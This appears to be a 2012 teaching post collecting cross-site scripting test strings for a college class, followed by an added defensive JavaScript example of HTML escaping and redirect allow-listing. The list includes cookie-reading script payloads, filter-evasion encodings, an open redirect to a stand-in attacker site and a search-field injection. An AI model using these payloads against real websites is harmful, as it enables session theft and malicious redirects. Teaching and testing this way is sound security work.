These were compiled in September of 2012. If you are reading this well into the future, you will want to go back and verify that these still work.
So what types of testing can you do for Cross Site Scripting? This is a quick collection of standard Cross Site Scripting notation from around the Internet: security blogs, security sites, and some of the more interesting underground web sites out there. These are just examples of the code that you can use to test for cross site scripting.
<script>alert(document.cookie);</script> - reads the page's cookie from script and shows it in an alert box; the same access is how someone else's cookie gets stolen, or how you reach a cookie that you might not otherwise have access to.
<body onload=alert('test')> - loads the XSS using the body onload event handler
<script>alert('Xss By Your Name here')</script> - using a standard JavaScript alert notation
SomePage.php?url=http://EvilHackerSite.com - simple redirect to a page of your choice
</script><script>alert%28document.cookie%29</script><script> - nested script tags for evasion, if you think the site you are looking at is protected by a firewall or other security system
%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%22%29%3C/script%3E - using URL encoding (percent-encoding of the UTF-8 bytes) or another encoding for evasion
POST: retURL=http%3A%2F%2Fwww.xssed.com%2F - using a POST parameter to redirect to a different URL than intended
POST: keywords=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search.x=0&search.y=0 - using POST to subvert the internal site search engine (all sites have a search feature unless they are horribly out of date)
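What these strings are checking for, seen from the server side: the search term has to be HTML-encoded before it is echoed back, and a redirect parameter has to be resolved against an allow-list. The code below is an added example, not code from the original post or from the sites it cites; the origin https://www.example.test and the function names are assumptions.

```javascript
// Added example, not code from the original post.
// Assumption: the application's own origin is https://www.example.test.
const APP_ORIGIN = "https://www.example.test";
const ALLOWED_REDIRECT_HOSTS = new Set(["www.example.test"]);

const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode a value for an HTML text node or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Echo the search term back into the form the way a results page would.
function renderSearchBox(keywords) {
  return '<input name="keywords" value="' + escapeHtml(keywords) + '">';
}

// Resolve a redirect parameter; anything off the allow-list goes to the fallback.
function safeRedirectTarget(rawUrl, fallback = APP_ORIGIN + "/") {
  let target;
  try {
    target = new URL(rawUrl, APP_ORIGIN); // also resolves "//host" and "/\host" forms
  } catch (err) {
    return fallback;
  }
  const allowed = target.protocol === "https:" && ALLOWED_REDIRECT_HOSTS.has(target.hostname);
  return allowed ? target.href : fallback;
}

// Parameter values from the list above, decoded once as a web framework would.
const searchTerm = decodeURIComponent("%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E");
const postRedirect = decodeURIComponent("http%3A%2F%2Fwww.xssed.com%2F");

console.log(renderSearchBox(searchTerm));                 // markup arrives as inert text
console.log(safeRedirectTarget(postRedirect));            // falls back to the site root
console.log(safeRedirectTarget("http://EvilHackerSite.com"));
console.log(safeRedirectTarget("/results?page=2"));       // constructed legitimate value
```

The encoder covers HTML body and quoted-attribute contexts only; values placed inside script blocks, URLs or CSS need the encoder for that context.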
There are a lot of places out there that have a lot of very good examples. These were pulled from XSSED.com, Hackers.org, and CGI-Security. These are being used in my Application Hacking class at Highline Community College, in a private network, with known vulnerable software. No system was compromised in the pursuit of this knowledge. Please don’t try this at home.